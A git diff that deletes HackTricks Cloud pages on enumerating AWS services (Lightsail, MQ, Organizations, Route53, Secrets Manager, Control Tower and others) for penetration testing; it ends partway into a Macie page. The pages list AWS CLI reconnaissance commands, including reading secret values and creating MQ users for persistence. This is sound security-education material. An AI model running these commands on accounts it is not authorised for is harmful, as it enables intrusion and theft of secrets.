-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md b/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md deleted file mode 100644 index 3d2778ee1..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md +++ /dev/null @@ -1,85 +0,0 @@ -# AWS - Lightsail Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS - Lightsail - -Amazon Lightsail provides an **easy**, lightweight way for new cloud users to take advantage of AWS’ cloud computing services. It allows you to deploy common and custom web services in seconds via **VMs** (**EC2**) and **containers**.\ -It's a **minimal EC2 + Route53 + ECS**. - -### Enumeration - -```bash -# Instances -aws lightsail get-instances #Get all -aws lightsail get-instance-port-states --instance-name #Get open ports - -# Databases -aws lightsail get-relational-databases -aws lightsail get-relational-database-snapshots -aws lightsail get-relational-database-parameters - -# Disk & snapshots -aws lightsail get-instance-snapshots -aws lightsail get-disk-snapshots -aws lightsail get-disks - -# More -aws lightsail get-load-balancers -aws lightsail get-static-ips -aws lightsail get-key-pairs -``` - -### Analyse Snapshots - -It's possible to generate **instance and relational database snapshots from lightsail**. Therefore you can check those the same way you can check [**EC2 snapshots**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) and [**RDS snapshots**](aws-relational-database-rds-enum.md#enumeration). - -### Metadata - -**Metadata endpoint is accessible from lightsail**, but the machines are running in an **AWS account managed by AWS** so you don't control **what permissions are being granted**. However, if you find a way to exploit those you would be directly exploiting AWS. 
- -### Privesc - -{% content-ref url="../aws-privilege-escalation/aws-lightsail-privesc.md" %} -[aws-lightsail-privesc.md](../aws-privilege-escalation/aws-lightsail-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-lightsail-post-exploitation.md" %} -[aws-lightsail-post-exploitation.md](../aws-post-exploitation/aws-lightsail-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-lightsail-persistence.md" %} -[aws-lightsail-persistence.md](../aws-persistence/aws-lightsail-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md b/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md deleted file mode 100644 index 30e76cde6..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md +++ /dev/null @@ -1,103 +0,0 @@ -# AWS - MQ Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Amazon MQ - -### Introduction to Message Brokers - -**Message brokers** serve as intermediaries, facilitating communication between different software systems, which may be built on varied platforms and programmed in different languages. **Amazon MQ** simplifies the deployment, operation, and maintenance of message brokers on AWS. It provides managed services for **Apache ActiveMQ** and **RabbitMQ**, ensuring seamless provisioning and automatic software version updates. - -### AWS - RabbitMQ - -RabbitMQ is a prominent **message-queueing software**, also known as a _message broker_ or _queue manager_. It's fundamentally a system where queues are configured. Applications interface with these queues to **send and receive messages**. Messages in this context can carry a variety of information, ranging from commands to initiate processes on other applications (potentially on different servers) to simple text messages. The messages are held by the queue-manager software until they are retrieved and processed by a receiving application. AWS provides an easy-to-use solution for hosting and managing RabbitMQ servers. - -### AWS - ActiveMQ - -Apache ActiveMQ® is a leading open-source, Java-based **message broker** known for its versatility. It supports multiple industry-standard protocols, offering extensive client compatibility across a wide array of languages and platforms. Users can: - -* Connect with clients written in JavaScript, C, C++, Python, .Net, and more. -* Leverage the **AMQP** protocol to integrate applications from different platforms. -* Use **STOMP** over websockets for web application message exchanges. -* Manage IoT devices with **MQTT**. -* Maintain existing **JMS** infrastructure and extend its capabilities. - -ActiveMQ's robustness and flexibility make it suitable for a multitude of messaging requirements. 
- -## Enumeration - -```bash -# List brokers -aws mq list-brokers - -# Get broker info -aws mq describe-broker --broker-id -## Find endpoints in .BrokerInstances -## Find if public accessible in .PubliclyAccessible - -# List usernames (only for ActiveMQ) -aws mq list-users --broker-id - -# Get user info (PASSWORD NOT INCLUDED) -aws mq describe-user --broker-id --username - -# Lits configurations (only for ActiveMQ) -aws mq list-configurations -## Here you can find if simple or LDAP authentication is used - -# Creacte Active MQ user -aws mq create-user --broker-id --password --username --console-access -``` - -{% hint style="warning" %} -TODO: Indicate how to enumerate RabbitMQ and ActiveMQ internally and how to listen in all queues and send data (send PR if you know how to do this) -{% endhint %} - -## Privesc - -{% content-ref url="../aws-privilege-escalation/aws-mq-privesc.md" %} -[aws-mq-privesc.md](../aws-privilege-escalation/aws-mq-privesc.md) -{% endcontent-ref %} - -## Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md" %} -[aws-mq-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md) -{% endcontent-ref %} - -## Persistence - -If you know the credentials to access the RabbitMQ web console, you can create a new user qith admin privileges. - -## References - -* [https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html](https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html) -* [https://activemq.apache.org/](https://activemq.apache.org/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md b/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md deleted file mode 100644 index 06598159d..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md +++ /dev/null @@ -1,73 +0,0 @@ -# AWS - Organizations Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Baisc Information - -AWS Organizations facilitates the creation of new AWS accounts without incurring additional costs. Resources can be allocated effortlessly, accounts can be efficiently grouped, and governance policies can be applied to individual accounts or groups, enhancing management and control within the organization. - -Key Points: - -* **New Account Creation**: AWS Organizations allows the creation of new AWS accounts without extra charges. -* **Resource Allocation**: It simplifies the process of allocating resources across the accounts. -* **Account Grouping**: Accounts can be grouped together, making management more streamlined. -* **Governance Policies**: Policies can be applied to accounts or groups of accounts, ensuring compliance and governance across the organization. - -You can find more information in: - -{% content-ref url="../aws-basic-information/" %} -[aws-basic-information](../aws-basic-information/) -{% endcontent-ref %} - -```bash -# Get Org -aws organizations describe-organization -aws organizations list-roots - -# Get OUs, from root and from other OUs -aws organizations list-organizational-units-for-parent --parent-id r-lalala -aws organizations list-organizational-units-for-parent --parent-id ou-n8s9-8nzv3a5y - -# Get accounts -## List all the accounts without caring about the parent -aws organizations list-accounts -## Accounts from a parent -aws organizations list-accounts-for-parent --parent-id r-lalala -aws organizations list-accounts-for-parent --parent-id ou-n8s9-8nzv3a5y - -# Get basic account info -## You need the permission iam:GetAccountSummary -aws iam get-account-summary -``` - -## References - -* https://aws.amazon.com/organizations/ - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert 
(GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md b/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md deleted file mode 100644 index 13db530f0..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md +++ /dev/null @@ -1,50 +0,0 @@ -# AWS - Other Services Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Directconnect - -Allows to **connect a corporate private network with AWS** (so you could compromise an EC2 instance and access the corporate network). - -``` -aws directconnect describe-connections -aws directconnect describe-interconnects -aws directconnect describe-virtual-gateways -aws directconnect describe-virtual-interfaces -``` - -## Support - -In AWS you can access current and previous support cases via the API - -``` -aws support describe-cases --include-resolved-cases -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md b/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md deleted file mode 100644 index 96cc1cdee..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md +++ /dev/null @@ -1,57 +0,0 @@ -# AWS - Route53 Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Route 53 - -Amazon Route 53 is a cloud **Domain Name System (DNS)** web service.\ -You can create https, http and tcp **health checks for web pages** via Route53. - -### IP-based routing - -This is useful to tune your DNS routing to make the best DNS routing decisions for your end users.\ -IP-based routing offers you the additional ability to **optimize routing based on specific knowledge of your customer base**. - -### Enumeration - -```bash -aws route53 list-hosted-zones # Get domains -aws route53 get-hosted-zone --id -aws route53 list-resource-record-sets --hosted-zone-id # Get all records -aws route53 list-health-checks -aws route53 list-traffic-policies -``` - -### Privesc - -{% content-ref url="../aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md" %} -[route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md](../aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md b/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md deleted file mode 100644 index 95d71ffd1..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md +++ /dev/null @@ -1,76 +0,0 @@ -# AWS - Secrets Manager Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS Secrets Manager - -AWS Secrets Manager is designed to **eliminate the use of hard-coded secrets in applications by replacing them with an API call**. This service serves as a **centralized repository for all your secrets**, ensuring they are managed uniformly across all applications. - -The manager simplifies the **process of rotating secrets**, significantly improving the security posture of sensitive data like database credentials. Additionally, secrets like API keys can be automatically rotated with the integration of lambda functions. - -The access to secrets is tightly controlled through detailed IAM identity-based policies and resource-based policies. - -For granting access to secrets to a user from a different AWS account, it's necessary to: - -1. Authorize the user to access the secret. -2. Grant permission to the user to decrypt the secret using KMS. -3. Modify the Key policy to allow the external user to utilize it. - -**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.** - -### **Enumeration** - -```bash -aws secretsmanager list-secrets #Get metadata of all secrets -aws secretsmanager list-secret-version-ids --secret-id # Get versions -aws secretsmanager describe-secret --secret-id # Get metadata -aws secretsmanager get-secret-value --secret-id # Get value -aws secretsmanager get-secret-value --secret-id --version-id # Get value of a different version -aws secretsmanager get-resource-policy --secret-id --secret-id -``` - -### Privesc - -{% content-ref url="../aws-privilege-escalation/aws-secrets-manager-privesc.md" %} -[aws-secrets-manager-privesc.md](../aws-privilege-escalation/aws-secrets-manager-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-secrets-manager-post-exploitation.md" %} -[aws-secrets-manager-post-exploitation.md](../aws-post-exploitation/aws-secrets-manager-post-exploitation.md) -{% endcontent-ref %} - -### 
Persistence - -{% content-ref url="../aws-persistence/aws-secrets-manager-persistence.md" %} -[aws-secrets-manager-persistence.md](../aws-persistence/aws-secrets-manager-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md deleted file mode 100644 index 203439dda..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md +++ /dev/null @@ -1,72 +0,0 @@ -# AWS - Control Tower Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Control Tower - -{% hint style="info" %} -In summary, Control Tower is a service that allows to define policies for all your accounts inside your org. So instead of managing each of the you can set policies from COntrol Tower that will be applied on them. -{% endhint %} - -AWS Control Tower is a **service provided by Amazon Web Services (AWS)** that enables organizations to set up and govern a secure, compliant, multi-account environment in AWS. - -AWS Control Tower provides a **pre-defined set of best-practice blueprints** that can be customized to meet specific **organizational requirements**. These blueprints include pre-configured AWS services and features, such as AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, and AWS Service Catalog. - -With AWS Control Tower, administrators can quickly set up a **multi-account environment that meets organizational requirements**, such as **security** and compliance. The service provides a central dashboard to view and manage accounts and resources, and it also automates the provisioning of accounts, services, and policies. - -In addition, AWS Control Tower provides guardrails, which are a set of pre-configured policies that ensure the environment remains compliant with organizational requirements. These policies can be customized to meet specific needs. - -Overall, AWS Control Tower simplifies the process of setting up and managing a secure, compliant, multi-account environment in AWS, making it easier for organizations to focus on their core business objectives. 
- -### Enumeration - -For enumerating controltower controls, you first need to **have enumerated the org**: - -{% content-ref url="../aws-organizations-enum.md" %} -[aws-organizations-enum.md](../aws-organizations-enum.md) -{% endcontent-ref %} - -{% code overflow="wrap" %} -```bash -# Get controls applied in an account -aws controltower list-enabled-controls --target-identifier arn:aws:organizations:::ou/ -``` -{% endcode %} - -{% hint style="warning" %} -Control Tower can also use **Account factory** to execute **CloudFormation templates** in **accounts and run services** (privesc, post-exploitation...) in those accounts -{% endhint %} - -### Post Exploitation & Persistence - -{% content-ref url="../../aws-post-exploitation/aws-control-tower-post-exploitation.md" %} -[aws-control-tower-post-exploitation.md](../../aws-post-exploitation/aws-control-tower-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md deleted file mode 100644 index 588e24ab1..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md +++ /dev/null @@ -1,41 +0,0 @@ -# AWS - Cost Explorer Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cost Explorer and Anomaly detection - -This allows you to check **how are you expending money in AWS services** and help you **detecting anomalies**.\ -Moreover, you can configure an anomaly detection so AWS will warn you when some a**nomaly in costs is found**. - -### Budgets - -Budgets help to **manage costs and usage**. You can get **alerted when a threshold is reached**.\ -Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md deleted file mode 100644 index 35ff808ba..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md +++ /dev/null @@ -1,42 +0,0 @@ -# AWS - Detective Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Detective - -**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations. - -The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause. - -## References - -* [https://aws.amazon.com/detective/](https://aws.amazon.com/detective/) -* [https://cloudsecdocs.com/aws/services/logging/other/#detective](https://cloudsecdocs.com/aws/services/logging/other/#detective) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md b/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md deleted file mode 100644 index 6667dcf6b..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md +++ /dev/null @@ -1,145 +0,0 @@ -# AWS - Macie Enum - -## AWS - Macie Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
